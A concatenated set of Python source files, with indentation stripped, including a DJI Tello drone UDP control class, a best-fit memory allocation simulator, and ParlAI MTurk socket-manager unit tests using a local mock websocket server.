obs, rews, dones, infos = map(np.array, zip(*results))
self.ts += 1
for (i, done) in enumerate(dones):
if all(done):
obs[i] = self.envs[i].reset()
self.ts[i] = 0
self.actions = None
return np.array(obs), np.array(rews), np.array(dones), infos
def reset(self):
results = [env.reset() for env in self.envs]
return np.array(results)
def close(self):
return
|
tello.py
|
import socket
import threading
import cv2
import logging
import time
class Tello:
#logger setup
handler = logging.StreamHandler()
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
logger = logging.getLogger('tello')
logger.addHandler(handler)
logger.setLevel(logging.INFO)
#client port
client_ip = ''
client_port = 8889
#video port
video_ip = '0.0.0.0'
video_port = 11111
#state port
state_port = 8890
#time to wait before issuing new command
wait_time = 0.5
max_response_time = 7
def __init__(self):
tello_ip = '192.168.10.1'
tello_port = 8889
enable_exceptions = True
retry_count = 3
self.cap = None
last_received_command = time.time()
self.address = (tello_ip, tello_port)
self.command_timeout = 0.3
self.imperial = False
self.response = None
self.response_state = None #to attain the response of the states
self.stream_on = False
self.enable_exceptions = enable_exceptions
self.retry_count = retry_count
#socket to communicate with Tello
self.socket_client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # socket for sending commands
self.socket_state = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # socket for receiving Tello state
self.socket_client.bind(('', self.client_port))
self.socket_state.bind(('', self.state_port))
#create thread for receiving acknowledge/error from Tello
thread1 = threading.Thread(target = self.receive_thread, args = ())
thread1.daemon = True
thread1.start()
#create thread for receiving state from Tello
thread2 = threading.Thread(target = self.get_state, args = ())
thread2.daemon = True
thread2.start()
#Runs in background to get Tello state
def get_state(self):
while True:
try:
self.response_state, _ = self.socket_state.recvfrom(128)
except Exception as e:
self.logger.error(e)
break
#Runs in background to get Tello responses
def receive_thread(self):
while True:
try:
self.response, _ = self.socket_client.recvfrom(1024)
except Exception as e:
self.logger.error(e)
break
def video_address(self):
return 'udp://@' + self.video_ip + ':' + str(self.video_port) # + '?overrun_nonfatal=1&fifo_size=5000'
#Get video capture from drone
def video_capture(self):
# if self.cap is None:
# self.cap = cv2.VideoCapture(self.get_udp_video_address())
# if not self.cap.isOpened():
# self.cap.open(self.video_address())
#while not self.stopped:
self.frame = self.cap.read()
return self.frame
#Start video streaming
def video_capture_start(self):
self.streamon()
#threading.Thread(target=self.video_capture, args=()).start()
self.cap = cv2.VideoCapture(self.video_address())
self.cap.open(self.video_address())
#self.stopped = False
return self
#Stop video streaming
def video_capture_stop(self):
self.streamoff()
#self.stopped = True
#Send command to Tello
#param command: Command to send
#return: Response from Tello (str)
def send_command(self, command):
time_diff = time.time() * 1000 - self.wait_time
if time_diff < self.wait_time:
time.sleep(time_diff)
self.logger.info('Send command: ' + command)
timestamp = int(time.time() * 1000)
self.socket_client.sendto(command.encode('utf-8'), self.address)
while self.response is None:
if (time.time() * 1000) - timestamp > self.max_response_time * 1000:
self.logger.warning('Timeout exceed on command ' + command)
return False
tello_response = self.response.decode('utf-8').rstrip("\r\n")
self.logger.info('Response from Tello: ' + tello_response)
self.response = None
self.last_received_command = time.time() * 1000
return tello_response
#Send command to Tello
#param command: Command to send
#return: No Response from Tello
def send_command_noreturn(self, command):
self.logger.info('Send command (w/ no response): ' + command)
self.socket_client.sendto(command.encode('utf-8'), self.address)
'''
Send control command to Tello
If Ok response, return true
If No/Error response, return false call command_error method
command: entry SDK mode
takeoff: Tello auto takeoff
land: Tello auto land
streamon: Set video stream on
streamoff: Set video stream off
emergency: Stop all motors immediately
up x: Tello fly up with distance x cm. x: 20-500
down x: Tello fly down with distance x cm. x: 20-500
left x: Tello fly left with distance x cm. x: 20-500
right x: Tello fly right with distance x cm. x: 20-500
forward x: Tello fly forward with distance x cm. x: 20-500
back x: Tello fly back with distance x cm. x: 20-500
cw x: Tello rotate x degree clockwise x: 1-3600
ccw x: Tello rotate x degree counter- clockwise. x: 1-3600
speed x: set speed to x cm/s. x: 10-100
'''
def send_control_command(self, command):
for i in range(0, self.retry_count):
response = self.send_command(command)
if response == 'OK' or response == 'ok':
return True
#return self.command_error(command, response, self.enable_exceptions)
#Called if command is unsuccessful
def command_error(command, response, enable_exceptions):
message = 'Command ' + command + ' was unsuccessful. Response from Tello: ' + str(response)
if enable_exceptions:
raise Exception(message)
else:
self.logger.error(message)
return False
##############################################################################################
##### CONTROL COMMANDS FOR TELLO #####
##############################################################################################
#methods return True or False if command was successful/unsuccessful
def connect(self):
result = self.send_control_command("command")
return result
def streamon(self):
result = self.send_control_command("streamon")
return result
def streamoff(self):
result = self.send_control_command("streamoff")
return result
def takeoff(self):
result = self.send_control_command("takeoff")
return result
def land(self):
result = self.send_control_command("land")
return result
def emergency(self):
result = self.send_control_command("emergency")
return result
'''
up x: Tello fly up with distance x cm.
down x: Tello fly down with distance x cm.
left x: Tello fly left with distance x cm.
right x: Tello fly right with distance x cm.
forward x: Tello fly forward with distance x cm.
back x: Tello fly back with distance x cm.
x: 20 - 500
'''
def move(self, direction, distance):
if distance < 20:
distance = 20
elif distance > 500:
distance = 500
move_command = "%s %s" %(direction, distance)
result = self.send_control_command(move_command)
return result
'''
cw x: Tello rotate x degree clockwise.
ccw x: Tello rotate x degree counter- clockwise.
x: 1 - 3600
'''
def rotate(self, direction, angle):
if angle < 1:
angle = 1
elif angle > 3600:
angle = 3600
rotate_command = "%s %s" %(direction, angle)
result = self.send_control_command(rotate_command)
return result
'''
speed x: set speed to x cm/s.
x: 10-100
'''
def set_speed(self, speed):
if speed < 10:
speed = 10
elif speed > 100:
speed = 100
speed_command = "speed %s" %(speed)
result = self.send_control_command(speed_command)
return result
def end(self):
self.video_capture_stop()
self.cap.release()
|
memory.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# By Allex Lima <allexlima@unn.edu.br> | www.allexlima.com
import support
from threading import Thread
class Block(object):
def __init__(self, size=None):
self.address = None
self.size = {
'total': size,
'available': size
}
self.content = []
self.__pseudo_values_maker()
def __pseudo_values_maker(self):
"""
In this method, I'll generate the values for Block attributes.
The majority of the values are sorted pseudo-randomly by g_int_value([ab]) function,
in nano_os/support.py.
:return void
"""
"""
Block address is an random int between 10000 and 30000 converted to hexadecimal
"""
self.address = hex(support.g_int_value((10000, 30000)))
"""
If Testing mode is off, create more random values for block size
"""
if support.TESTING is not True:
"""
Get an random int for m_size var then attach this value in attribute size, that is a dict structure
with 'total' and 'available' info about block size
"""
m_size = support.g_int_value()
self.size.update({
'total': m_size,
'available': m_size
})
class Memory(object):
def __init__(self, width):
self.__list = []
self.width = width
self.__pseudo_values_maker()
def __pseudo_values_maker(self):
"""
In this method, I'll insert Block objects in self.__list list attribute
:return void
"""
for i in range(0, self.width, 1):
if support.TESTING is True:
"""
If Testing mode is On, then put blocks with sizes from support.SIZES list,
available in nano_os/support.py
"""
self.__list.append(Block(support.SIZES[i]))
else:
"""
Else, blocks will have random value sizes
"""
self.__list.append(Block())
def get_block(self, address):
"""
This method will return an block Object by address attribute of this one.
:param address: string with address block value
:return: Block Object
"""
try:
return next(item for item in self.__list if item.address == address)
except StopIteration:
pass
def get_array(self):
"""
Return the list of blocks, i.e. Memory Array
:return: list
"""
return self.__list
def alloc_in(self, obj, address):
"""
This method will alloc some obj (Process Object) in a particular memory block
through the address (Block address attribute) of this one.
:param obj: must be a Process Object
:param address: must be a address attribute from some Block Object
:return: void
"""
try:
block = self.get_block(address)
block.content.append(obj)
block.size.update({
'available': block.size['available'] - obj.size
})
obj.state = support.P_STATES[1]
except AttributeError:
pass
class MemoryManager(Memory):
def __init__(self, m_blocks_quantity=10):
super(MemoryManager, self).__init__(m_blocks_quantity if support.TESTING is not True else len(support.SIZES))
self.memory = self.get_array()
@staticmethod
def __listing_style(obj):
return {
'address': obj.address,
'size': {
'total': "{0} KiB".format(obj.size['total']),
'available': "{0} KiB".format(obj.size['available']),
},
'content': [{'pid': item.pid, 'size': '{0} KiB'.format(item.size)} for item in obj.content]
}
def best_fit(self, process):
"""
This is the MAIN method, since now, of this project.
It'll return the best block to allocate some process, using as an parameter the process size.
Basically, it will return a block with size more close of the process size.
Block.size <= best_position (for the process size) <= Block.size
:param process: must be an Process Object
:return: an Address attribute from the best Block to allocate this Process Object
"""
"""
Get the process size
"""
process_size = process.size
"""
Set an arbitrary initial value to distante.
This var will be used to discover HOW DISTANT last block was from that actual block, in loop
"""
distance = 1000
"""
Set initially best_position as None
because the algorithm can not find some Block with available size to allocate it one
"""
best_position = None
"""
This loop will check block per block from the memory analysing the Block and Process size
to find the best position
"""
for i in range(0, len(self.memory)):
"""
Set the actual Block size available (i.e., Size available in the block in 'i' position of the memory)
to block_size
"""
block_size = self.memory[i].size['available']
"""
If the absolute value of the subtraction between block_size and process_size is less than
last distance AND block_size is equal or greater than process_size
(i.e. this block is more closer of the process size AND there is available space)
THEN...
"""
if abs(block_size - process_size) < distance and block_size >= process_size:
"""
best_position will be settled with the current memory position
"""
best_position = i
"""
and I'll update the distance value, once this actual distance is less than the last one
"""
distance = abs(block_size - process_size)
"""
Finally, if were found some best Block available, it Address attribute will be returned
"""
if best_position is not None:
return self.memory[best_position].address
else:
"""
Else, I generate a message log informing the PID of the process that won't be allocated
"""
support.ERRORS.append("[Warning] Could not find an available space for process {0}.".format(process.pid))
def alloc(self, obj):
"""
This method will receive some Process to be allocated and will pass this one for bestfit method
:param obj: A Process Object
:return: Block Address were the process was best allocated ;)
"""
address = self.best_fit(obj)
if address is not None:
"""
Create a thread to alloc process informing the Process Object and the Block Address attribute
where it will be allocated
"""
my_thread = Thread(target=self.alloc_in, args=(obj, address))
"""
Start the thread
"""
my_thread.start()
"""
Join the response to current context
"""
my_thread.join()
"""
Return the address where the Process Object was allocated
"""
return address
else:
pass
def free(self, address):
"""
This an method tha can be helpful to clean some Process from the memory array
:param address: A Address attribute from some block that will be cleaned
:return: void
"""
self.get_block(address)
def show(self, address=None):
"""
This method will print one particular memory block or, all memory array
:param address: [Optional] Address attribute from some Block
:return: list
"""
aux = None
if address:
try:
aux = MemoryManager.__listing_style(self.get_block(address))
except AttributeError:
pass
else:
aux = []
for item in range(0, len(self.memory), 1):
aux.append(MemoryManager.__listing_style(self.memory[item]))
return aux
|
test_socket_manager.py
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import time
import uuid
from unittest import mock
from parlai.mturk.core.dev.socket_manager import Packet, SocketManager
from parlai.mturk.core.dev.agents import AssignState
import parlai.mturk.core.dev.data_model as data_model
import parlai.mturk.core.dev.shared_utils as shared_utils
import threading
from websocket_server import WebsocketServer
import json
TEST_WORKER_ID_1 = 'TEST_WORKER_ID_1'
TEST_ASSIGNMENT_ID_1 = 'TEST_ASSIGNMENT_ID_1'
TEST_HIT_ID_1 = 'TEST_HIT_ID_1'
TEST_WORKER_ID_2 = 'TEST_WORKER_ID_2'
TEST_ASSIGNMENT_ID_2 = 'TEST_ASSIGNMENT_ID_2'
TEST_HIT_ID_2 = 'TEST_HIT_ID_2'
TEST_CONV_ID_1 = 'TEST_CONV_ID_1'
FAKE_ID = 'BOGUS'
MESSAGE_ID_1 = 'MESSAGE_ID_1'
MESSAGE_ID_2 = 'MESSAGE_ID_2'
MESSAGE_ID_3 = 'MESSAGE_ID_3'
MESSAGE_ID_4 = 'MESSAGE_ID_4'
COMMAND_ID_1 = 'COMMAND_ID_1'
MESSAGE_TYPE = data_model.MESSAGE_TYPE_ACT
COMMAND_TYPE = data_model.MESSAGE_TYPE_COMMAND
MESSAGE_1 = {'message_id': MESSAGE_ID_1, 'type': MESSAGE_TYPE}
MESSAGE_2 = {'message_id': MESSAGE_ID_2, 'type': MESSAGE_TYPE}
COMMAND_1 = {'message_id': COMMAND_ID_1, 'type': COMMAND_TYPE}
AGENT_ID = 'AGENT_ID'
ACT_1 = {'text': 'THIS IS A MESSAGE', 'id': AGENT_ID}
ACT_2 = {'text': 'THIS IS A MESSAGE AGAIN', 'id': AGENT_ID}
active_statuses = [
AssignState.STATUS_NONE,
AssignState.STATUS_ONBOARDING,
AssignState.STATUS_WAITING,
AssignState.STATUS_IN_TASK,
]
complete_statuses = [
AssignState.STATUS_DONE,
AssignState.STATUS_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT,
AssignState.STATUS_PARTNER_DISCONNECT_EARLY,
AssignState.STATUS_EXPIRED,
AssignState.STATUS_RETURNED,
]
statuses = active_statuses + complete_statuses
TASK_GROUP_ID_1 = 'TASK_GROUP_ID_1'
SocketManager.DEF_MISSED_PONGS = 3
SocketManager.DEF_DEAD_TIME = 0.6
shared_utils.THREAD_SHORT_SLEEP = 0.05
shared_utils.THREAD_MEDIUM_SLEEP = 0.15
class TestPacket(unittest.TestCase):
"""
Various unit tests for the AssignState class.
"""
ID = 'ID'
SENDER_ID = 'SENDER_ID'
RECEIVER_ID = 'RECEIVER_ID'
ASSIGNMENT_ID = 'ASSIGNMENT_ID'
DATA = 'DATA'
CONVERSATION_ID = 'CONVERSATION_ID'
ACK_FUNCTION = 'ACK_FUNCTION'
def setUp(self):
self.packet_1 = Packet(
self.ID,
data_model.MESSAGE_BATCH,
self.SENDER_ID,
self.RECEIVER_ID,
self.ASSIGNMENT_ID,
self.DATA,
conversation_id=self.CONVERSATION_ID,
ack_func=self.ACK_FUNCTION,
)
self.packet_2 = Packet(
self.ID,
data_model.SNS_MESSAGE,
self.SENDER_ID,
self.RECEIVER_ID,
self.ASSIGNMENT_ID,
self.DATA,
)
self.packet_3 = Packet(
self.ID,
data_model.AGENT_ALIVE,
self.SENDER_ID,
self.RECEIVER_ID,
self.ASSIGNMENT_ID,
self.DATA,
)
def tearDown(self):
pass
def test_packet_init(self):
"""
Test proper initialization of packet fields.
"""
self.assertEqual(self.packet_1.id, self.ID)
self.assertEqual(self.packet_1.type, data_model.MESSAGE_BATCH)
self.assertEqual(self.packet_1.sender_id, self.SENDER_ID)
self.assertEqual(self.packet_1.receiver_id, self.RECEIVER_ID)
self.assertEqual(self.packet_1.assignment_id, self.ASSIGNMENT_ID)
self.assertEqual(self.packet_1.data, self.DATA)
self.assertEqual(self.packet_1.conversation_id, self.CONVERSATION_ID)
self.assertEqual(self.packet_1.ack_func, self.ACK_FUNCTION)
self.assertEqual(self.packet_1.status, Packet.STATUS_INIT)
self.assertEqual(self.packet_2.id, self.ID)
self.assertEqual(self.packet_2.type, data_model.SNS_MESSAGE)
self.assertEqual(self.packet_2.sender_id, self.SENDER_ID)
self.assertEqual(self.packet_2.receiver_id, self.RECEIVER_ID)
self.assertEqual(self.packet_2.assignment_id, self.ASSIGNMENT_ID)
self.assertEqual(self.packet_2.data, self.DATA)
self.assertIsNone(self.packet_2.conversation_id)
self.assertIsNone(self.packet_2.ack_func)
self.assertEqual(self.packet_2.status, Packet.STATUS_INIT)
self.assertEqual(self.packet_3.id, self.ID)
self.assertEqual(self.packet_3.type, data_model.AGENT_ALIVE)
self.assertEqual(self.packet_3.sender_id, self.SENDER_ID)
self.assertEqual(self.packet_3.receiver_id, self.RECEIVER_ID)
self.assertEqual(self.packet_3.assignment_id, self.ASSIGNMENT_ID)
self.assertEqual(self.packet_3.data, self.DATA)
self.assertIsNone(self.packet_3.conversation_id)
self.assertIsNone(self.packet_3.ack_func)
self.assertEqual(self.packet_3.status, Packet.STATUS_INIT)
def test_dict_conversion(self):
"""
Ensure packets can be converted to and from a representative dict.
"""
converted_packet = Packet.from_dict(self.packet_1.as_dict())
self.assertEqual(self.packet_1.id, converted_packet.id)
self.assertEqual(self.packet_1.type, converted_packet.type)
self.assertEqual(self.packet_1.sender_id, converted_packet.sender_id)
self.assertEqual(self.packet_1.receiver_id, converted_packet.receiver_id)
self.assertEqual(self.packet_1.assignment_id, converted_packet.assignment_id)
self.assertEqual(self.packet_1.data, converted_packet.data)
self.assertEqual(
self.packet_1.conversation_id, converted_packet.conversation_id
)
packet_dict = self.packet_1.as_dict()
self.assertDictEqual(packet_dict, Packet.from_dict(packet_dict).as_dict())
def test_connection_ids(self):
"""
Ensure that connection ids are reported as we expect them.
"""
sender_conn_id = '{}_{}'.format(self.SENDER_ID, self.ASSIGNMENT_ID)
receiver_conn_id = '{}_{}'.format(self.RECEIVER_ID, self.ASSIGNMENT_ID)
self.assertEqual(self.packet_1.get_sender_connection_id(), sender_conn_id)
self.assertEqual(self.packet_1.get_receiver_connection_id(), receiver_conn_id)
def test_packet_conversions(self):
"""
Ensure that packet copies and acts are produced properly.
"""
# Copy important packet
message_packet_copy = self.packet_1.new_copy()
self.assertNotEqual(message_packet_copy.id, self.ID)
self.assertNotEqual(message_packet_copy, self.packet_1)
self.assertEqual(message_packet_copy.type, self.packet_1.type)
self.assertEqual(message_packet_copy.sender_id, self.packet_1.sender_id)
self.assertEqual(message_packet_copy.receiver_id, self.packet_1.receiver_id)
self.assertEqual(message_packet_copy.assignment_id, self.packet_1.assignment_id)
self.assertEqual(message_packet_copy.data, self.packet_1.data)
self.assertEqual(
message_packet_copy.conversation_id, self.packet_1.conversation_id
)
self.assertIsNone(message_packet_copy.ack_func)
self.assertEqual(message_packet_copy.status, Packet.STATUS_INIT)
# Copy non-important packet
hb_packet_copy = self.packet_2.new_copy()
self.assertNotEqual(hb_packet_copy.id, self.ID)
self.assertNotEqual(hb_packet_copy, self.packet_2)
self.assertEqual(hb_packet_copy.type, self.packet_2.type)
self.assertEqual(hb_packet_copy.sender_id, self.packet_2.sender_id)
self.assertEqual(hb_packet_copy.receiver_id, self.packet_2.receiver_id)
self.assertEqual(hb_packet_copy.assignment_id, self.packet_2.assignment_id)
self.assertEqual(hb_packet_copy.data, self.packet_2.data)
self.assertEqual(hb_packet_copy.conversation_id, self.packet_2.conversation_id)
self.assertIsNone(hb_packet_copy.ack_func)
self.assertEqual(hb_packet_copy.status, Packet.STATUS_INIT)
def test_packet_modifications(self):
"""
Ensure that packet copies and acts are produced properly.
"""
# All operations return the packet
self.assertEqual(self.packet_1.swap_sender(), self.packet_1)
self.assertEqual(
self.packet_1.set_type(data_model.MESSAGE_BATCH), self.packet_1
)
self.assertEqual(self.packet_1.set_data(None), self.packet_1)
# Ensure all of the operations worked
self.assertEqual(self.packet_1.sender_id, self.RECEIVER_ID)
self.assertEqual(self.packet_1.receiver_id, self.SENDER_ID)
self.assertEqual(self.packet_1.type, data_model.MESSAGE_BATCH)
self.assertIsNone(self.packet_1.data)
class MockSocket:
def __init__(self):
self.last_messages = {}
self.connected = False
self.disconnected = False
self.closed = False
self.ws = None
self.fake_workers = []
self.port = None
self.launch_socket()
self.handlers = {}
while self.ws is None:
time.sleep(0.05)
time.sleep(1)
def send(self, packet):
self.ws.send_message_to_all(packet)
def close(self):
if not self.closed:
self.ws.server_close()
self.ws.shutdown()
self.closed = True
def do_nothing(self, *args):
pass
def launch_socket(self):
def on_message(client, server, message):
if self.closed:
raise Exception('Socket is already closed...')
if message == '':
return
packet_dict = json.loads(message)
if packet_dict['content']['id'] == 'WORLD_ALIVE':
self.ws.send_message(client, json.dumps({'type': 'conn_success'}))
self.connected = True
elif packet_dict['type'] == data_model.WORLD_PING:
pong = packet_dict['content'].copy()
pong['type'] = 'pong'
self.ws.send_message(
client,
json.dumps({'type': data_model.SERVER_PONG, 'content': pong}),
)
if 'receiver_id' in packet_dict['content']:
receiver_id = packet_dict['content']['receiver_id']
use_func = self.handlers.get(receiver_id, self.do_nothing)
use_func(packet_dict['content'])
def on_connect(client, server):
pass
def on_disconnect(client, server):
self.disconnected = True
def run_socket(*args):
port = 3030
while self.port is None:
try:
self.ws = WebsocketServer(port, host='127.0.0.1')
self.port = port
except OSError:
port += 1
self.ws.set_fn_client_left(on_disconnect)
self.ws.set_fn_new_client(on_connect)
self.ws.set_fn_message_received(on_message)
self.ws.run_forever()
self.listen_thread = threading.Thread(
target=run_socket, name='Fake-Socket-Thread'
)
self.listen_thread.daemon = True
self.listen_thread.start()
class MockAgent(object):
"""
Class that pretends to be an MTurk agent interacting through the webpage by
simulating the same commands that are sent from the core.html file.
Exposes methods to use for testing and checking status
"""
def __init__(self, hit_id, assignment_id, worker_id, task_group_id):
self.conversation_id = None
self.id = None
self.assignment_id = assignment_id
self.hit_id = hit_id
self.worker_id = worker_id
self.some_agent_disconnected = False
self.disconnected = False
self.task_group_id = task_group_id
self.ws = None
self.ready = False
self.wants_to_send = False
def send_packet(self, packet):
def callback(*args):
pass
event_name = data_model.MESSAGE_BATCH
self.ws.send(json.dumps({'type': event_name, 'content': packet.as_dict()}))
def register_to_socket(self, ws, on_msg):
handler = self.make_packet_handler(on_msg)
self.ws = ws
self.ws.handlers[self.worker_id] = handler
def make_packet_handler(self, on_msg):
"""
A packet handler.
"""
def handler_mock(pkt):
if pkt['type'] == data_model.WORLD_MESSAGE:
packet = Packet.from_dict(pkt)
on_msg(packet)
elif pkt['type'] == data_model.MESSAGE_BATCH:
packet = Packet.from_dict(pkt)
on_msg(packet)
elif pkt['type'] == data_model.AGENT_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception(
'Invalid Packet type {} received in {}'.format(pkt['type'], pkt)
)
return handler_mock
def build_and_send_packet(self, packet_type, data):
msg_id = str(uuid.uuid4())
msg = {
'id': msg_id,
'type': packet_type,
'sender_id': self.worker_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'receiver_id': '[World_' + self.task_group_id + ']',
'data': data,
}
if packet_type == data_model.MESSAGE_BATCH:
msg['data'] = {
'messages': [
{
'id': msg_id,
'type': packet_type,
'sender_id': self.worker_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'receiver_id': '[World_' + self.task_group_id + ']',
'data': data,
}
]
}
self.ws.send(json.dumps({'type': packet_type, 'content': msg}))
return msg['id']
def send_message(self, text):
data = {
'text': text,
'id': self.id,
'message_id': str(uuid.uuid4()),
'episode_done': False,
}
self.wants_to_send = False
return self.build_and_send_packet(data_model.MESSAGE_BATCH, data)
def send_disconnect(self):
data = {
'hit_id': self.hit_id,
'assignment_id': self.assignment_id,
'worker_id': self.worker_id,
'conversation_id': self.conversation_id,
'connection_id': '{}_{}'.format(self.worker_id, self.assignment_id),
}
return self.build_and_send_packet(data_model.AGENT_DISCONNECT, data)
def send_alive(self):
data = {
'hit_id': self.hit_id,
'assignment_id': self.assignment_id,
'worker_id': self.worker_id,
'conversation_id': self.conversation_id,
}
return self.build_and_send_packet(data_model.AGENT_ALIVE, data)
class TestSocketManagerSetupAndFunctions(unittest.TestCase):
"""
Unit/integration tests for starting up a socket.
"""
def setUp(self):
self.fake_socket = MockSocket()
time.sleep(1)
def tearDown(self):
self.fake_socket.close()
def test_init_and_reg_shutdown(self):
"""
Test initialization of a socket manager.
"""
self.assertFalse(self.fake_socket.connected)
# Callbacks should never trigger during proper setup and shutdown
nop_called = False
def nop(*args):
nonlocal nop_called # noqa 999 we don't support py2
nop_called = True
socket_manager = SocketManager(
'https://127.0.0.1',
self.fake_socket.port,
nop,
nop,
nop,
TASK_GROUP_ID_1,
0.3,
nop,
)
self.assertTrue(self.fake_socket.connected)
self.assertFalse(nop_called)
# Test shutdown
self.assertFalse(self.fake_socket.disconnected)
self.assertFalse(socket_manager.is_shutdown)
self.assertTrue(socket_manager.alive)
socket_manager.shutdown()
time.sleep(0.3)
self.assertTrue(self.fake_socket.disconnected)
self.assertTrue(socket_manager.is_shutdown)
self.assertFalse(nop_called)
def assertEqualBy(self, val_func, val, max_time):
start_time = time.time()
while val_func() != val:
assert time.time() - start_time < max_time, (
"Value was not attained in specified time, was {} rather "
"than {}".format(val_func(), val)
)
time.sleep(0.1)
def test_init_and_socket_shutdown(self):
"""
Test initialization of a socket manager with a failed shutdown.
"""
self.assertFalse(self.fake_socket.connected)
# Callbacks should never trigger during proper setup and shutdown
nop_called = False
def nop(*args):
nonlocal nop_called # noqa 999 we don't support py2
nop_called = True
server_death_called = False
def server_death(*args):
nonlocal server_death_called
server_death_called = True
socket_manager = SocketManager(
'https://127.0.0.1',
self.fake_socket.port,
nop,
nop,
nop,
TASK_GROUP_ID_1,
0.4,
server_death,
)
self.assertTrue(self.fake_socket.connected)
self.assertFalse(nop_called)
self.assertFalse(server_death_called)
# Test shutdown
self.assertFalse(self.fake_socket.disconnected)
self.assertFalse(socket_manager.is_shutdown)
self.assertTrue(socket_manager.alive)
self.fake_socket.close()
self.assertEqualBy(lambda: socket_manager.alive, False, 8)
self.assertEqualBy(lambda: server_death_called, True, 20)
self.assertFalse(nop_called)
socket_manager.shutdown()
def test_init_and_socket_shutdown_then_restart(self):
"""
Test restoring connection to a socket.
"""
self.assertFalse(self.fake_socket.connected)
# Callbacks should never trigger during proper setup and shutdown
nop_called = False
def nop(*args):
nonlocal nop_called # noqa 999 we don't support py2
nop_called = True
server_death_called = False
def server_death(*args):
nonlocal server_death_called
server_death_called = True
socket_manager = SocketManager(
'https://127.0.0.1',
self.fake_socket.port,
nop,
nop,
nop,
TASK_GROUP_ID_1,
0.4,
server_death,
)
self.assertTrue(self.fake_socket.connected)
self.assertFalse(nop_called)
self.assertFalse(server_death_called)
# Test shutdown
self.assertFalse(self.fake_socket.disconnected)
self.assertFalse(socket_manager.is_shutdown)
self.assertTrue(socket_manager.alive)
self.fake_socket.close()
self.assertEqualBy(lambda: socket_manager.alive, False, 8)
self.assertFalse(socket_manager.alive)
self.fake_socket = MockSocket()
self.assertEqualBy(lambda: socket_manager.alive, True, 4)
self.assertFalse(nop_called)
self.assertFalse(server_death_called)
socket_manager.shutdown()
def test_init_world_dead(self):
"""
Test initialization of a socket manager with a failed startup.
"""
self.assertFalse(self.fake_socket.connected)
self.fake_socket.close()
# Callbacks should never trigger during proper setup and shutdown
nop_called = False
def nop(*args):
nonlocal nop_called # noqa 999 we don't support py2
nop_called = True
server_death_called = False
def server_death(*args):
nonlocal server_death_called
server_death_called = True
with self.assertRaises(ConnectionRefusedError):
socket_manager = SocketManager(
'https://127.0.0.1',
self.fake_socket.port,
nop,
nop,
nop,
TASK_GROUP_ID_1,
0.4,
server_death,
)
self.assertIsNone(socket_manager)
self.assertFalse(nop_called)
self.assertTrue(server_death_called)
class TestSocketManagerRoutingFunctionality(unittest.TestCase):
ID = 'ID'
SENDER_ID = 'SENDER_ID'
ASSIGNMENT_ID = 'ASSIGNMENT_ID'
DATA = 'DATA'
CONVERSATION_ID = 'CONVERSATION_ID'
ACK_FUNCTION = 'ACK_FUNCTION'
WORLD_ID = '[World_{}]'.format(TASK_GROUP_ID_1)
def on_alive(self, packet):
self.alive_packet = packet
def on_message(self, packet):
self.message_packet = packet
def on_worker_death(self, worker_id, assignment_id):
self.dead_worker_id = worker_id
self.dead_assignment_id = assignment_id
def on_server_death(self):
self.server_died = True
def setUp(self):
self.AGENT_ALIVE_PACKET = Packet(
MESSAGE_ID_1,
data_model.AGENT_ALIVE,
self.SENDER_ID,
self.WORLD_ID,
self.ASSIGNMENT_ID,
self.DATA,
self.CONVERSATION_ID,
)
self.MESSAGE_SEND_PACKET_1 = Packet(
MESSAGE_ID_2,
data_model.WORLD_MESSAGE,
self.WORLD_ID,
self.SENDER_ID,
self.ASSIGNMENT_ID,
self.DATA,
self.CONVERSATION_ID,
)
self.MESSAGE_SEND_PACKET_2 = Packet(
MESSAGE_ID_3,
data_model.MESSAGE_BATCH,
self.WORLD_ID,
self.SENDER_ID,
self.ASSIGNMENT_ID,
self.DATA,
self.CONVERSATION_ID,
)
self.MESSAGE_SEND_PACKET_3 = Packet(
MESSAGE_ID_4,
data_model.MESSAGE_BATCH,
self.WORLD_ID,
self.SENDER_ID,
self.ASSIGNMENT_ID,
self.DATA,
self.CONVERSATION_ID,
)
self.fake_socket = MockSocket()
time.sleep(0.3)
self.alive_packet = None
self.message_packet = None
self.dead_worker_id = None
self.dead_assignment_id = None
self.server_died = False
self.socket_manager = SocketManager(
'https://127.0.0.1',
self.fake_socket.port,
self.on_alive,
self.on_message,
self.on_worker_death,
TASK_GROUP_ID_1,
1,
self.on_server_death,
)
def tearDown(self):
self.socket_manager.shutdown()
self.fake_socket.close()
def test_init_state(self):
"""
Ensure all of the initial state of the socket_manager is ready.
"""
self.assertEqual(self.socket_manager.server_url, 'https://127.0.0.1')
self.assertEqual(self.socket_manager.port, self.fake_socket.port)
self.assertEqual(self.socket_manager.alive_callback, self.on_alive)
self.assertEqual(self.socket_manager.message_callback, self.on_message)
self.assertEqual(self.socket_manager.socket_dead_callback, self.on_worker_death)
self.assertEqual(self.socket_manager.task_group_id, TASK_GROUP_ID_1)
self.assertEqual(
self.socket_manager.missed_pongs, 1 + (1 / SocketManager.PING_RATE)
)
self.assertIsNotNone(self.socket_manager.ws)
self.assertTrue(self.socket_manager.keep_running)
self.assertIsNotNone(self.socket_manager.listen_thread)
self.assertSetEqual(self.socket_manager.open_channels, set())
self.assertDictEqual(self.socket_manager.packet_map, {})
self.assertTrue(self.socket_manager.alive)
self.assertFalse(self.socket_manager.is_shutdown)
self.assertEqual(self.socket_manager.get_my_sender_id(), self.WORLD_ID)
def _send_packet_in_background(self, packet, send_time):
"""
creates a thread to handle waiting for a packet send.
"""
def do_send():
self.socket_manager._send_packet(packet, send_time)
self.sent = True
send_thread = threading.Thread(target=do_send, daemon=True)
send_thread.start()
time.sleep(0.02)
def test_packet_send(self):
"""
Checks to see if packets are working.
"""
self.socket_manager._safe_send = mock.MagicMock()
self.sent = False
# Test a blocking acknowledged packet
send_time = time.time()
self.assertEqual(self.MESSAGE_SEND_PACKET_2.status, Packet.STATUS_INIT)
self._send_packet_in_background(self.MESSAGE_SEND_PACKET_2, send_time)
self.assertEqual(self.MESSAGE_SEND_PACKET_2.status, Packet.STATUS_SENT)
self.socket_manager._safe_send.assert_called_once()
self.assertTrue(self.sent)
